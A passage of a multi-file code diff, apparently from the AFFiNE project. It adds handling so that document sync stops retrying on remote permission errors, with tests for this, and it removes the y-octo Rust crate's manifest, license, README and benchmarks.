let chunk_config = ChunkConfig::try_from(&self.splitter_options)?;
Ok(
text_splitter::TextSplitter::new(chunk_config)
.chunks(text)
.map(|x| x.to_string())
.collect(),
)
}
}
@@ -1,37 +0,0 @@
use std::collections::HashMap;
use serde_json::Value;
#[derive(Debug, Clone)]
pub struct Document {
pub page_content: String,
pub metadata: HashMap<String, Value>,
}
impl Document {
/// Constructs a new `Document` with the provided `page_content` and an
/// empty `metadata` map.
pub fn new<S: Into<String>>(page_content: S) -> Self {
Document {
page_content: page_content.into(),
metadata: HashMap::new(),
}
}
/// Sets the `metadata` Map of the `Document` to the provided HashMap.
pub fn with_metadata(mut self, metadata: HashMap<String, Value>) -> Self {
self.metadata = metadata;
self
}
}
impl Default for Document {
/// Provides a default `Document` with an empty `page_content` and an
/// empty `metadata` map.
fn default() -> Self {
Document {
page_content: "".to_string(),
metadata: HashMap::new(),
}
}
}
-2
@@ -1,5 +1,3 @@
#[cfg(feature = "doc-loader")]
pub mod doc_loader;
#[cfg(feature = "ydoc-loader")]
pub mod doc_parser;
#[cfg(feature = "hashcash")]
@@ -33,6 +33,7 @@ import {
SpaceStorage,
} from '../storage';
import { Sync } from '../sync';
import { DocSyncPeer } from '../sync/doc/peer';
import { IndexerSyncImpl } from '../sync/indexer';
import { expectYjsEqual } from './utils';
@@ -112,6 +113,64 @@ class TestDocStorage implements DocStorage {
}
}
class PermissionDeniedRemoteDocStorage implements DocStorage {
readonly storageType = 'doc' as const;
readonly connection = new DummyConnection();
readonly isReadonly = false;
pushCount = 0;
constructor(readonly spaceId: string) {}
async getDoc(_docId: string): Promise<DocRecord | null> {
return null;
}
async getDocDiff(
_docId: string,
_state?: Uint8Array
): Promise<DocDiff | null> {
return null;
}
async pushDocUpdate(_update: DocUpdate): Promise<DocClock> {
this.pushCount++;
const error = new Error('No permission to update doc');
error.name = 'DOC_ACTION_DENIED';
throw error;
}
async getDocTimestamp(_docId: string): Promise<DocClock | null> {
return null;
}
async getDocTimestamps(): Promise<DocClocks> {
return {};
}
async deleteDoc(_docId: string): Promise<void> {
return;
}
subscribeDocUpdate(_callback: (update: DocRecord, origin?: string) => void) {
return () => {};
}
}
class PermissionDeniedConnection extends DummyConnection {
waitCount = 0;
override async waitForConnected(_signal?: AbortSignal): Promise<void> {
this.waitCount++;
const error = new Error('No permission to access space');
error.name = 'SPACE_ACCESS_DENIED';
throw error;
}
}
class PermissionDeniedConnectionDocStorage extends PermissionDeniedRemoteDocStorage {
override readonly connection = new PermissionDeniedConnection();
}
class TrackingIndexerStorage extends IndexerStorageBase {
override readonly connection = new DummyConnection();
override readonly isReadonly = false;
@@ -425,6 +484,201 @@ test('blob', async () => {
}
});
test('doc sync peer stops retrying a doc when remote denies permission', async () => {
const local = new IndexedDBDocStorage({
id: 'ws-denied',
flavour: 'local-denied',
type: 'workspace',
});
const syncMetadata = new IndexedDBDocSyncStorage({
id: 'ws-denied',
flavour: 'local-denied',
type: 'workspace',
});
const remote = new PermissionDeniedRemoteDocStorage('ws-denied');
const peer = new DocSyncPeer('remote-denied', local, syncMetadata, remote);
const abort = new AbortController();
local.connection.connect();
syncMetadata.connection.connect();
await local.connection.waitForConnected();
await syncMetadata.connection.waitForConnected();
const doc = new YDoc();
doc.getMap('test').set('hello', 'world');
await local.pushDocUpdate({
docId: 'doc-denied',
bin: encodeStateAsUpdate(doc),
});
try {
void peer.mainLoop(abort.signal);
await vi.waitFor(() => {
expect(remote.pushCount).toBe(1);
});
await vi.waitFor(() => {
let state:
| {
syncing: boolean;
synced: boolean;
retrying: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.docState$('doc-denied').subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
syncing: false,
synced: false,
retrying: false,
errorMessage: expect.stringContaining('No permission'),
});
});
await vi.waitFor(() => {
let state:
| {
synced: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.peerState$.subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
synced: false,
errorMessage: expect.stringContaining('No permission'),
});
});
await new Promise(resolve => setTimeout(resolve, 1200));
expect(remote.pushCount).toBe(1);
} finally {
abort.abort();
local.connection.disconnect();
syncMetadata.connection.disconnect();
}
});
test('doc sync peer stops retrying when remote connection denies permission', async () => {
const local = new IndexedDBDocStorage({
id: 'ws-connection-denied',
flavour: 'local-connection-denied',
type: 'workspace',
});
const syncMetadata = new IndexedDBDocSyncStorage({
id: 'ws-connection-denied',
flavour: 'local-connection-denied',
type: 'workspace',
});
const remote = new PermissionDeniedConnectionDocStorage(
'ws-connection-denied'
);
const peer = new DocSyncPeer(
'remote-connection-denied',
local,
syncMetadata,
remote
);
const abort = new AbortController();
local.connection.connect();
syncMetadata.connection.connect();
await local.connection.waitForConnected();
await syncMetadata.connection.waitForConnected();
try {
void peer.mainLoop(abort.signal);
await vi.waitFor(() => {
expect(remote.connection.waitCount).toBe(1);
});
await vi.waitFor(() => {
let state:
| {
retrying: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.peerState$.subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
retrying: false,
errorMessage: expect.stringContaining('No permission'),
});
});
await new Promise(resolve => setTimeout(resolve, 1200));
expect(remote.connection.waitCount).toBe(1);
} finally {
abort.abort();
local.connection.disconnect();
syncMetadata.connection.disconnect();
}
});
test('doc sync peer resolves on terminal permission error without abort signal', async () => {
const local = new IndexedDBDocStorage({
id: 'ws-connection-denied-no-signal',
flavour: 'local-connection-denied-no-signal',
type: 'workspace',
});
const syncMetadata = new IndexedDBDocSyncStorage({
id: 'ws-connection-denied-no-signal',
flavour: 'local-connection-denied-no-signal',
type: 'workspace',
});
const remote = new PermissionDeniedConnectionDocStorage(
'ws-connection-denied-no-signal'
);
const peer = new DocSyncPeer(
'remote-connection-denied-no-signal',
local,
syncMetadata,
remote
);
local.connection.connect();
syncMetadata.connection.connect();
await local.connection.waitForConnected();
await syncMetadata.connection.waitForConnected();
try {
await expect(peer.mainLoop()).resolves.toBeUndefined();
expect(remote.connection.waitCount).toBe(1);
let state:
| {
retrying: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.peerState$.subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
retrying: false,
errorMessage: expect.stringContaining('No permission'),
});
} finally {
local.connection.disconnect();
syncMetadata.connection.disconnect();
}
});
test('indexer defers indexed clock persistence until a refresh happens on delayed refresh storages', async () => {
const calls: string[] = [];
const docsInRootDoc = new Map([['doc1', { title: 'Doc 1' }]]);
+19 -8
@@ -22,6 +22,12 @@ interface CloudDocStorageOptions extends DocStorageOptions {
type: SpaceType;
}
function createWebsocketError(error: { name: string; message: string }) {
const err = new Error(error.message);
err.name = error.name;
return err;
}
export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
static readonly identifier = 'CloudDocStorage';
@@ -88,7 +94,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
return null;
}
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -111,7 +117,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
return null;
}
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -132,7 +138,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
if ('error' in response) {
// TODO(@forehalo): use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -153,7 +159,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
if ('error' in response) {
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -174,7 +180,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
if ('error' in response) {
// TODO(@forehalo): use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return Object.entries(response.data).reduce((ret, [docId, timestamp]) => {
@@ -184,11 +190,16 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
}
override async deleteDoc(docId: string) {
this.socket.emit('space:delete-doc', {
const response = await this.socket.emitWithAck('space:delete-doc', {
spaceType: this.spaceType,
spaceId: this.spaceId,
docId: this.idConverter.newIdToOldId(docId),
});
if ('error' in response) {
// TODO(@forehalo): use [UserFriendlyError]
throw createWebsocketError(response.error);
}
}
protected async setDocSnapshot() {
@@ -224,7 +235,7 @@ class CloudDocStorageConnection extends SocketConnection {
});
if ('error' in res) {
throw new Error(res.error.message);
throw createWebsocketError(res.error);
}
if (!this.idConverter) {
@@ -272,7 +283,7 @@ class CloudDocStorageConnection extends SocketConnection {
return null;
}
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return base64ToUint8Array(response.data.missing);
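The substitution repeated through this file, `new Error(response.error.message)` becoming `createWebsocketError(response.error)`, keeps the server-provided error name on the thrown error. A minimal TypeScript sketch of why that matters, assuming a hypothetical `SocketErrorPayload` shape (the diff only shows that `name` and `message` are read); the name check mirrors `isRemotePermissionError` from the sync peer change in this same comparison:

```typescript
// Hypothetical payload shape; the diff only shows that `name` and `message` exist.
interface SocketErrorPayload {
  name: string;
  message: string;
}

// Mirrors createWebsocketError from the diff: keep the server-provided name.
function createWebsocketError(error: SocketErrorPayload): Error {
  const err = new Error(error.message);
  err.name = error.name;
  return err;
}

// Mirrors isRemotePermissionError from the diff: classify by error name.
function isRemotePermissionError(error: unknown): boolean {
  if (!(error instanceof Error)) {
    return false;
  }
  const name = error.name.toUpperCase();
  return name === 'DOC_ACTION_DENIED' || name === 'SPACE_ACCESS_DENIED';
}

const payload: SocketErrorPayload = {
  name: 'DOC_ACTION_DENIED',
  message: 'No permission to update doc',
};

// Old behaviour: the name defaults to "Error", so the check cannot match.
const before = new Error(payload.message);
// New behaviour: the name is preserved, so the check matches.
const after = createWebsocketError(payload);

console.log(isRemotePermissionError(before)); // false
console.log(isRemotePermissionError(after)); // true
```

Classifying by `name` rather than by message text means the human-readable message can change without affecting the retry decision.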
@@ -121,7 +121,10 @@ interface ClientEvents {
timestamp: number;
},
];
'space:delete-doc': { spaceType: string; spaceId: string; docId: string };
'space:delete-doc': [
{ spaceType: string; spaceId: string; docId: string },
{ success?: true },
];
'telemetry:batch': [TelemetryBatch, TelemetryAck];
+122 -18
@@ -38,6 +38,7 @@ type Job =
interface Status {
docs: Set<string>;
connectedDocs: Set<string>;
docErrors: Map<string, string>;
jobDocQueue: AsyncPriorityQueue;
jobMap: Map<string, Job[]>;
remoteClocks: ClockMap;
@@ -78,9 +79,12 @@ function createJobErrorCatcher<
await fn(docId, ...args);
} catch (err) {
if (err instanceof Error) {
throw new Error(
const wrapped = new Error(
`Error in job "${k}": ${err.stack || err.message}`
);
wrapped.name = err.name;
(wrapped as Error & { cause?: unknown }).cause = err;
throw wrapped;
} else {
throw err;
}
@@ -91,6 +95,14 @@ function createJobErrorCatcher<
) as Jobs;
}
function isRemotePermissionError(error: unknown) {
if (!(error instanceof Error)) {
return false;
}
const name = error.name.toUpperCase();
return name === 'DOC_ACTION_DENIED' || name === 'SPACE_ACCESS_DENIED';
}
function isEqualUint8Arrays(a: Uint8Array, b: Uint8Array) {
if (a.length !== b.length) {
return false;
@@ -155,6 +167,7 @@ export class DocSyncPeer {
private status: Status = {
docs: new Set<string>(),
connectedDocs: new Set<string>(),
docErrors: new Map<string, string>(),
jobDocQueue: new AsyncPriorityQueue(),
jobMap: new Map(),
remoteClocks: new ClockMap(new Map()),
@@ -165,6 +178,14 @@ export class DocSyncPeer {
};
private readonly statusUpdatedSubject$ = new Subject<string | true>();
private get currentErrorMessage() {
return (
this.status.errorMessage ??
this.status.docErrors.values().next().value ??
null
);
}
peerState$ = new Observable<PeerState>(subscribe => {
const next = () => {
if (this.status.skipped) {
@@ -182,7 +203,7 @@ export class DocSyncPeer {
syncing: this.status.docs.size,
synced: false,
retrying: this.status.retrying,
errorMessage: this.status.errorMessage,
errorMessage: this.currentErrorMessage,
});
} else {
const syncing = this.status.jobMap.size;
@@ -190,8 +211,8 @@ export class DocSyncPeer {
total: this.status.docs.size,
syncing: syncing,
retrying: this.status.retrying,
errorMessage: this.status.errorMessage,
synced: syncing === 0,
errorMessage: this.currentErrorMessage,
synced: syncing === 0 && this.status.docErrors.size === 0,
});
}
};
@@ -211,6 +232,7 @@ export class DocSyncPeer {
docState$(docId: string) {
return new Observable<PeerDocState>(subscribe => {
const next = () => {
const docErrorMessage = this.status.docErrors.get(docId) ?? null;
if (this.status.skipped) {
subscribe.next({
syncing: false,
@@ -218,14 +240,16 @@ export class DocSyncPeer {
retrying: false,
errorMessage: null,
});
return;
}
subscribe.next({
syncing:
!this.status.connectedDocs.has(docId) ||
this.status.jobMap.has(docId),
synced: !this.status.jobMap.has(docId),
!docErrorMessage &&
(!this.status.connectedDocs.has(docId) ||
this.status.jobMap.has(docId)),
synced: !docErrorMessage && !this.status.jobMap.has(docId),
retrying: this.status.retrying,
errorMessage: this.status.errorMessage,
errorMessage: docErrorMessage ?? this.status.errorMessage,
});
};
next();
@@ -469,6 +493,9 @@ export class DocSyncPeer {
private readonly actions = {
updateRemoteClock: (docId: string, remoteClock: Date) => {
if (this.status.docErrors.has(docId)) {
return;
}
this.status.remoteClocks.setIfBigger(docId, remoteClock);
this.statusUpdatedSubject$.next(docId);
},
@@ -494,6 +521,10 @@ export class DocSyncPeer {
update: Uint8Array;
clock: Date;
}) => {
if (this.status.docErrors.has(docId)) {
return;
}
// try add doc for new doc
this.actions.addDoc(docId);
@@ -514,6 +545,10 @@ export class DocSyncPeer {
update: Uint8Array;
remoteClock: Date;
}) => {
if (this.status.docErrors.has(docId)) {
return;
}
// try add doc for new doc
this.actions.addDoc(docId);
this.actions.updateRemoteClock(docId, remoteClock);
@@ -530,33 +565,45 @@ export class DocSyncPeer {
async mainLoop(signal?: AbortSignal) {
while (true) {
let shouldRetry = true;
try {
await this.retryLoop(signal);
} catch (err) {
if (signal?.aborted) {
return;
}
console.warn('Sync error, retry in 5s', err);
shouldRetry = !isRemotePermissionError(err);
console.warn(
shouldRetry
? 'Sync error, retry in 5s'
: 'Sync stopped due to remote permission error',
err
);
this.status.errorMessage =
err instanceof Error ? err.message : `${err}`;
this.status.retrying = shouldRetry;
this.statusUpdatedSubject$.next(true);
} finally {
// reset all status
this.status = {
docs: new Set(),
connectedDocs: new Set(),
docErrors: new Map(),
jobDocQueue: new AsyncPriorityQueue(),
jobMap: new Map(),
remoteClocks: new ClockMap(new Map()),
syncing: false,
skipped: false,
// tell ui to show retrying status
retrying: true,
retrying: shouldRetry,
// error message from last retry
errorMessage: this.status.errorMessage,
};
this.statusUpdatedSubject$.next(true);
}
if (!shouldRetry) {
return;
}
// wait for 5s before next retry
await Promise.race([
new Promise<void>(resolve => {
@@ -725,29 +772,53 @@ export class DocSyncPeer {
const connect = remove(jobs, j => j.type === 'connect');
if (connect && connect.length > 0) {
await this.jobs.connect(docId, signal);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.connect(docId, signal)
))
) {
break;
}
continue;
}
const pullAndPush = remove(jobs, j => j.type === 'pullAndPush');
if (pullAndPush && pullAndPush.length > 0) {
await this.jobs.pullAndPush(docId, signal);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.pullAndPush(docId, signal)
))
) {
break;
}
continue;
}
const pull = remove(jobs, j => j.type === 'pull');
if (pull && pull.length > 0) {
await this.jobs.pull(docId, signal);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.pull(docId, signal)
))
) {
break;
}
continue;
}
const push = remove(jobs, j => j.type === 'push');
if (push && push.length > 0) {
await this.jobs.push(
docId,
push as (Job & { type: 'push' })[],
signal
);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.push(
docId,
push as (Job & { type: 'push' })[],
signal
)
))
) {
break;
}
continue;
}
@@ -771,7 +842,40 @@ export class DocSyncPeer {
}
}
private async runRemoteDocJob(docId: string, job: () => Promise<void>) {
try {
await job();
return true;
} catch (error) {
if (!isRemotePermissionError(error)) {
throw error;
}
const message = error instanceof Error ? error.message : String(error);
console.warn('Sync skipped for doc due to remote permission error', {
docId,
error,
});
this.status.docErrors.set(docId, message);
this.status.connectedDocs.delete(docId);
this.status.jobMap.delete(docId);
this.statusUpdatedSubject$.next(docId);
this.statusUpdatedSubject$.next(true);
return false;
}
}
private schedule(job: Job) {
if (
this.status.docErrors.has(job.docId) &&
(job.type === 'connect' ||
job.type === 'push' ||
job.type === 'pull' ||
job.type === 'pullAndPush')
) {
return;
}
const priority = this.prioritySettings.get(job.docId) ?? 0;
this.status.jobDocQueue.push(job.docId, priority);
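The per-document error bookkeeping in this file can be sketched in isolation. This is a simplified TypeScript illustration, not the actual class: `MiniStatus`, `markDocDenied`, and `isPeerSynced` are hypothetical names, and the real `Status` carries more fields. It shows how a denied document is removed from the job map yet still keeps the peer from reporting `synced`:

```typescript
// Hypothetical, trimmed-down status; the real Status interface has more fields.
interface MiniStatus {
  jobMap: Map<string, unknown[]>;
  docErrors: Map<string, string>;
  errorMessage: string | null;
}

// Peer-level message: prefer the loop-level error, else the first per-doc error.
function currentErrorMessage(status: MiniStatus): string | null {
  const firstDocError: string | undefined = status.docErrors
    .values()
    .next().value;
  return status.errorMessage ?? firstDocError ?? null;
}

// The peer counts as synced only when no jobs remain and no doc was denied.
function isPeerSynced(status: MiniStatus): boolean {
  return status.jobMap.size === 0 && status.docErrors.size === 0;
}

// Mirrors the bookkeeping done on a permission error: record the message
// and drop the pending jobs for that doc so it is not retried.
function markDocDenied(status: MiniStatus, docId: string, message: string) {
  status.docErrors.set(docId, message);
  status.jobMap.delete(docId);
}

const status: MiniStatus = {
  jobMap: new Map([['doc-denied', [{ type: 'push' }]]]),
  docErrors: new Map(),
  errorMessage: null,
};

markDocDenied(status, 'doc-denied', 'No permission to update doc');

console.log(status.jobMap.size); // 0
console.log(isPeerSynced(status)); // false
console.log(currentErrorMessage(status)); // "No permission to update doc"
```

Without the `docErrors.size === 0` term, an empty job map alone would report the peer as synced even though one document was never pushed.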
-96
@@ -1,96 +0,0 @@
[package]
authors = [
"DarkSky <darksky2048@gmail.com>",
"forehalo <forehalo@gmail.com>",
"x1a0t <405028157@qq.com>",
"Brooklyn <lynweklm@gmail.com>",
]
description = "High-performance and thread-safe CRDT implementation compatible with Yjs"
edition = "2024"
homepage = "https://github.com/toeverything/y-octo"
include = ["src/**/*", "benches/**/*", "bin/**/*", "LICENSE", "README.md"]
keywords = ["collaboration", "crdt", "crdts", "yjs", "yata"]
license = "MIT"
name = "y-octo"
readme = "README.md"
repository = "https://github.com/toeverything/y-octo"
version = "0.0.2"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
ahash = { workspace = true }
byteorder = { workspace = true }
log = { workspace = true }
nanoid = { workspace = true }
nom = { workspace = true }
ordered-float = { workspace = true }
rand = { workspace = true }
rand_chacha = { workspace = true }
rand_distr = { workspace = true }
serde = { workspace = true, features = ["derive"] }
serde_json = { workspace = true }
smol_str = { workspace = true }
thiserror = { workspace = true }
[features]
bench = []
debug = []
default = []
events = []
large_refs = []
serde_json = []
subscribe = []
[target.'cfg(fuzzing)'.dependencies]
arbitrary = { workspace = true }
ordered-float = { workspace = true, features = ["arbitrary"] }
[target.'cfg(loom)'.dependencies]
loom = { workspace = true }
# override the dev-dependencies feature
async-lock = { workspace = true }
[dev-dependencies]
assert-json-diff = { workspace = true }
criterion = { workspace = true }
lib0 = { workspace = true }
ordered-float = { workspace = true, features = ["proptest"] }
path-ext = { workspace = true }
proptest = { workspace = true }
proptest-derive = { workspace = true }
yrs = { workspace = true }
[lints.rust]
unexpected_cfgs = { level = "warn", check-cfg = [
'cfg(debug)',
'cfg(fuzzing)',
'cfg(loom)',
] }
[[bench]]
harness = false
name = "array_ops_benchmarks"
[[bench]]
harness = false
name = "codec_benchmarks"
[[bench]]
harness = false
name = "map_ops_benchmarks"
[[bench]]
harness = false
name = "text_ops_benchmarks"
[[bench]]
harness = false
name = "apply_benchmarks"
[[bench]]
harness = false
name = "update_benchmarks"
[lib]
bench = true
-9
@@ -1,9 +0,0 @@
The MIT License (MIT)
Copyright (c) 2022-present TOEVERYTHING PTE. LTD. and its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-100
@@ -1,100 +0,0 @@
# Y-Octo
[![test](https://github.com/toeverything/y-octo/actions/workflows/y-octo.yml/badge.svg)](https://github.com/toeverything/y-octo/actions/workflows/y-octo.yml)
[![docs]](https://docs.rs/y-octo/latest/y_octo)
[![crates]](https://crates.io/crates/y-octo)
[![codecov]](https://codecov.io/gh/toeverything/y-octo)
Y-Octo is a high-performance CRDT implementation compatible with [yjs].
## Introduction
Y-Octo is a tiny, ultra-fast CRDT collaboration library built for all major platforms. Developers can use Y-Octo as the [Single source of truth](https://en.wikipedia.org/wiki/Single_source_of_truth) for their application state, naturally turning the application into a [local-first](https://www.inkandswitch.com/local-first/) collaborative app.
Y-Octo is also interoperable and binary-compatible with [yjs]. Developers can use [yjs] to build local-first web applications that collaborate with native apps built on Y-Octo.
## Who is using Y-Octo
<a href="https://affine.pro"><img src="./assets/affine.svg" /></a>
[AFFiNE](https://affine.pro) uses y-octo in production, in both its [Electron](https://affine.pro/download) app and its [Node.js server](https://github.com/toeverything/AFFiNE/tree/canary/packages/backend/native).
<a href="https://www.mysc.app/"><img src="https://www.mysc.app/images/logo_blk.webp" width="120px" /></a>
[Mysc](https://www.mysc.app/) uses y-octo in its Rust server and in its iOS/Android clients via the Swift/Kotlin bindings (official bindings coming soon).
## Features
- ✅ Collaborative Text
  - ✅ Read and write styled, Unicode-compatible data.
  - 🚧 Add, modify, and delete text styles.
  - 🚧 Embedded JS data types and collaborative types.
  - ✅ Thread-safe collaborative types.
- Collaborative Array
  - ✅ Add, modify, and delete basic JS data types.
  - ✅ Recursively add, modify, and delete collaborative types.
  - ✅ Thread-safe collaborative types.
  - 🚧 Recursive event subscription.
- Collaborative Map
  - ✅ Add, modify, and delete basic JS data types.
  - ✅ Recursively add, modify, and delete collaborative types.
  - ✅ Thread-safe collaborative types.
  - 🚧 Recursive event subscription.
- 🚧 Collaborative Xml (Fragment / Element)
- ✅ Collaborative Doc Container
  - ✅ YATA CRDT state apply/diff compatible with [yjs].
  - ✅ Thread-safe state sync.
  - ✅ Store all collaborative types and JS data types.
  - ✅ Update event subscription.
  - 🚧 Sub Document.
- ✅ Yjs binary encoding
  - ✅ Awareness encoding.
  - ✅ Primitive type encoding.
  - ✅ Sync Protocol encoding.
  - ✅ Yjs update v1 encoding.
  - 🚧 Yjs update v2 encoding.
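
The primitive type encoding listed above is built on variable-length integers. The following is a minimal, std-only sketch of an unsigned varint round trip, assuming the usual layout of 7 payload bits per byte with the high bit marking "more bytes follow". The function names mirror the crate's `write_var_u64` / `read_var_u64`, but the signatures and error handling here are illustrative assumptions, not the crate's actual API.

```rust
use std::io::{self, Write};

/// Encode `num` with 7 payload bits per byte, least significant group first.
/// Every byte except the last has its high bit set.
fn write_var_u64<W: Write>(out: &mut W, mut num: u64) -> io::Result<()> {
    while num >= 0x80 {
        out.write_all(&[(num as u8 & 0x7f) | 0x80])?;
        num >>= 7;
    }
    out.write_all(&[num as u8])
}

/// Decode one value from the front of `input`.
/// Returns the value and the unread tail, or `None` if the input ends
/// before a terminating byte or uses more bytes than a u64 can need.
fn read_var_u64(input: &[u8]) -> Option<(u64, &[u8])> {
    let mut num = 0u64;
    let mut shift = 0u32;
    for (i, &byte) in input.iter().enumerate() {
        if shift >= 64 {
            return None;
        }
        num |= ((byte & 0x7f) as u64) << shift;
        if byte & 0x80 == 0 {
            return Some((num, &input[i + 1..]));
        }
        shift += 7;
    }
    None
}
```

Values below 128 take a single byte, which is why this layout suits the small lengths and clocks that dominate an update.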
## Testing & Linting
Put everything to the test! We've established various test suites, and we're continually working to improve our coverage:
- Rust Tests
  - Unit tests
  - [Loom](https://docs.rs/loom/latest/loom/) multi-threading tests
  - [Miri](https://github.com/rust-lang/miri) undefined behavior tests
  - [Address Sanitizer](https://doc.rust-lang.org/beta/unstable-book/compiler-flags/sanitizer.html) memory error detection
  - [Fuzzing](https://github.com/rust-fuzz/cargo-fuzz) tests
- Node Tests
- Smoke Tests
- Eslint, Clippy
## Related projects
- [OctoBase]: The open-source embedded database based on Y-Octo.
- [yjs]: Shared data types for building collaborative software on the web.
## Maintainers
- [DarkSky](https://github.com/darkskygit)
- [liuyi](https://github.com/forehalo)
- [LongYinan](https://github.com/Brooooooklyn)
## Why not [yrs](https://github.com/y-crdt/y-crdt/)
See [Why we're not using yrs](./y-octo-utils/yrs-is-unsafe/README.md)
## License
Y-Octo is [MIT licensed].
[codecov]: https://codecov.io/gh/toeverything/y-octo/graph/badge.svg?token=9AQY5Q1BYH
[crates]: https://img.shields.io/crates/v/y-octo.svg
[docs]: https://img.shields.io/docsrs/y-octo.svg
[test]: https://github.com/toeverything/y-octo/actions/workflows/y-octo.yml/badge.svg
[yjs]: https://github.com/yjs/yjs
[Address Sanitizer]: https://github.com/toeverything/y-octo/actions/workflows/y-octo-asan.yml/badge.svg
[Memory Leak Detect]: https://github.com/toeverything/y-octo/actions/workflows/y-octo-memory-test.yml/badge.svg
[OctoBase]: https://github.com/toeverything/octobase
[BlockSuite]: https://github.com/toeverything/blocksuite
[AFFiNE]: https://github.com/toeverything/affine
[MIT licensed]: ./LICENSE
@@ -1,34 +0,0 @@
mod utils;
use std::time::Duration;
use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main};
use path_ext::PathExt;
use utils::Files;
fn apply(c: &mut Criterion) {
let files = Files::load();
let mut group = c.benchmark_group("apply");
group.measurement_time(Duration::from_secs(15));
for file in &files.files {
group.throughput(Throughput::Bytes(file.content.len() as u64));
group.bench_with_input(
BenchmarkId::new("apply with jwst", file.path.name_str()),
&file.content,
|b, content| {
b.iter(|| {
use y_octo::*;
let mut doc = Doc::new();
doc.apply_update_from_binary_v1(content.clone()).unwrap()
});
},
);
}
group.finish();
}
criterion_group!(benches, apply);
criterion_main!(benches);
@@ -1,71 +0,0 @@
use std::time::Duration;
use criterion::{Criterion, criterion_group, criterion_main};
use rand::{Rng, SeedableRng};
fn operations(c: &mut Criterion) {
let mut group = c.benchmark_group("ops/array");
group.measurement_time(Duration::from_secs(15));
group.bench_function("jwst/insert", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
let mut rng = rand_chacha::ChaCha20Rng::seed_from_u64(1234);
let idxs = (0..99)
.map(|_| rng.random_range(0..base_text.len() as u64))
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut array = doc.get_or_create_array("test").unwrap();
for c in base_text.chars() {
array.push(c.to_string()).unwrap();
}
for idx in &idxs {
array.insert(*idx, "test").unwrap();
}
});
});
group.bench_function("jwst/insert range", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
let mut rng = rand_chacha::ChaCha20Rng::seed_from_u64(1234);
let idxs = (0..99)
.map(|_| rng.random_range(0..base_text.len() as u64))
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut array = doc.get_or_create_array("test").unwrap();
for c in base_text.chars() {
array.push(c.to_string()).unwrap();
}
for idx in &idxs {
array.insert(*idx, "test1").unwrap();
array.insert(idx + 1, "test2").unwrap();
}
});
});
group.bench_function("jwst/remove", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut array = doc.get_or_create_array("test").unwrap();
for c in base_text.chars() {
array.push(c.to_string()).unwrap();
}
for idx in (0..base_text.len() as u64).rev() {
array.remove(idx, 1).unwrap();
}
});
});
group.finish();
}
criterion_group!(benches, operations);
criterion_main!(benches);
@@ -1,91 +0,0 @@
use criterion::{Criterion, SamplingMode, criterion_group, criterion_main};
use y_octo::{read_var_i32, read_var_u64, write_var_i32, write_var_u64};
const BENCHMARK_SIZE: u32 = 100000;
fn codec(c: &mut Criterion) {
let mut codec_group = c.benchmark_group("codec");
codec_group.sampling_mode(SamplingMode::Flat);
{
codec_group.bench_function("jwst encode var_int (32 bit)", |b| {
b.iter(|| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as i32) {
write_var_i32(&mut encoder, i).unwrap();
}
})
});
codec_group.bench_function("jwst decode var_int (32 bit)", |b| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as i32) {
write_var_i32(&mut encoder, i).unwrap();
}
b.iter(|| {
let mut decoder = encoder.as_slice();
